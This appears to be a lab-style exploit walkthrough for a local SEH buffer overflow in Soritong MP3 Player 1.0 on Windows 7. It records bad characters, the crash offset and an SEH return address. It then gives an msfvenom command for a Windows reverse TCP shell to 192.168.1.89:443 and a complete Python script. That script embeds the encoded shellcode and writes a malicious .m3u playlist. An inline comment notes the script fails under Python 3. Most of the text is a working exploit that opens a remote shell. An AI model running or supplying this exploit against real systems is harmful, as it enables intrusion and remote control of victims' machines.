Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH) Walkthrough

reference Soritong MP3 Player 1.0 - Local Buffer Overflow (SEH)
os name Microsoft Windows 7 Professional
os version 6.1.7601 Service Pack 1 Build 7601
system type x86-based PC

I’ve also downloaded strmdll.dll, wmaudsdk.dll, drmclien.dll.

badchar

omitted
\x00\x0a\x0d

offset

omitted
264

return address

seh

omitted
Player.DLL 0x1001af39

shellcode

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.89 LPORT=443 -f python -v shellcode -b "\x00\x0a\x0d"

exploit.py

exploit.py
# badchar \x00\x0a\x0d
# Payload bytes produced by the msfvenom command listed above
# (windows/shell_reverse_tcp, -b "\x00\x0a\x0d"); the excluded bytes
# match the three listed in the comment on the line above.
shellcode = b""
shellcode += b"\xdb\xd2\xd9\x74\x24\xf4\xbb\xc3\x0b\xa5\xc5"
shellcode += b"\x5f\x31\xc9\xb1\x52\x31\x5f\x17\x83\xc7\x04"
shellcode += b"\x03\x9c\x18\x47\x30\xde\xf7\x05\xbb\x1e\x08"
shellcode += b"\x6a\x35\xfb\x39\xaa\x21\x88\x6a\x1a\x21\xdc"
shellcode += b"\x86\xd1\x67\xf4\x1d\x97\xaf\xfb\x96\x12\x96"
shellcode += b"\x32\x26\x0e\xea\x55\xa4\x4d\x3f\xb5\x95\x9d"
shellcode += b"\x32\xb4\xd2\xc0\xbf\xe4\x8b\x8f\x12\x18\xbf"
shellcode += b"\xda\xae\x93\xf3\xcb\xb6\x40\x43\xed\x97\xd7"
shellcode += b"\xdf\xb4\x37\xd6\x0c\xcd\x71\xc0\x51\xe8\xc8"
shellcode += b"\x7b\xa1\x86\xca\xad\xfb\x67\x60\x90\x33\x9a"
shellcode += b"\x78\xd5\xf4\x45\x0f\x2f\x07\xfb\x08\xf4\x75"
shellcode += b"\x27\x9c\xee\xde\xac\x06\xca\xdf\x61\xd0\x99"
shellcode += b"\xec\xce\x96\xc5\xf0\xd1\x7b\x7e\x0c\x59\x7a"
shellcode += b"\x50\x84\x19\x59\x74\xcc\xfa\xc0\x2d\xa8\xad"
shellcode += b"\xfd\x2d\x13\x11\x58\x26\xbe\x46\xd1\x65\xd7"
shellcode += b"\xab\xd8\x95\x27\xa4\x6b\xe6\x15\x6b\xc0\x60"
shellcode += b"\x16\xe4\xce\x77\x59\xdf\xb7\xe7\xa4\xe0\xc7"
shellcode += b"\x2e\x63\xb4\x97\x58\x42\xb5\x73\x98\x6b\x60"
shellcode += b"\xd3\xc8\xc3\xdb\x94\xb8\xa3\x8b\x7c\xd2\x2b"
shellcode += b"\xf3\x9d\xdd\xe1\x9c\x34\x24\x62\x63\x60\x27"
shellcode += b"\x2b\x0b\x73\x27\xca\x70\xfa\xc1\xa6\x96\xab"
shellcode += b"\x5a\x5f\x0e\xf6\x10\xfe\xcf\x2c\x5d\xc0\x44"
shellcode += b"\xc3\xa2\x8f\xac\xae\xb0\x78\x5d\xe5\xea\x2f"
shellcode += b"\x62\xd3\x82\xac\xf1\xb8\x52\xba\xe9\x16\x05"
shellcode += b"\xeb\xdc\x6e\xc3\x01\x46\xd9\xf1\xdb\x1e\x22"
shellcode += b"\xb1\x07\xe3\xad\x38\xc5\x5f\x8a\x2a\x13\x5f"
shellcode += b"\x96\x1e\xcb\x36\x40\xc8\xad\xe0\x22\xa2\x67"
shellcode += b"\x5e\xed\x22\xf1\xac\x2e\x34\xfe\xf8\xd8\xd8"
shellcode += b"\x4f\x55\x9d\xe7\x60\x31\x29\x90\x9c\xa1\xd6"
shellcode += b"\x4b\x25\xd1\x9c\xd1\x0c\x7a\x79\x80\x0c\xe7"
shellcode += b"\x7a\x7f\x52\x1e\xf9\x75\x2b\xe5\xe1\xfc\x2e"
shellcode += b"\xa1\xa5\xed\x42\xba\x43\x11\xf0\xbb\x41"

# Assemble the .m3u contents. The sizes come from the values recorded
# above: crash offset 264, and a total file length of 5000 bytes.
payload = "A" * (264 - 4)
# Four bytes occupying offsets 260..263, directly ahead of the SEH slot.
payload += "\xeb\x06\x41\x41"
# SEH overwrite at offset 264: 0x1001af39 from Player.DLL (see "seh"
# above), written little-endian.
payload += "\x39\xaf\x01\x10"
# Sixteen 0x90 bytes placed in front of the shellcode.
payload += "\x90" * 16
# NOTE(review): `payload` is a str while `shellcode` is bytes. Under
# Python 3 this line raises TypeError, and the text-mode open() below
# would pass the \x80-\xff characters through the platform codec instead
# of writing them as single raw bytes. The listing appears to have been
# written for a Python 2 interpreter; confirm before relying on it.
payload += shellcode
# Filler so the final file is exactly 5000 bytes:
# 260 + 4 + 4 + 16 + len(shellcode) + (5000 - 284 - len(shellcode)).
payload += "C" * (5000 - 264 - 4 - 16 - len(shellcode))

# Write the crafted playlist to disk (text mode, default platform encoding).
with open("exploit.m3u", "w") as fp:
    fp.write(payload)

proof

Open File->Open Files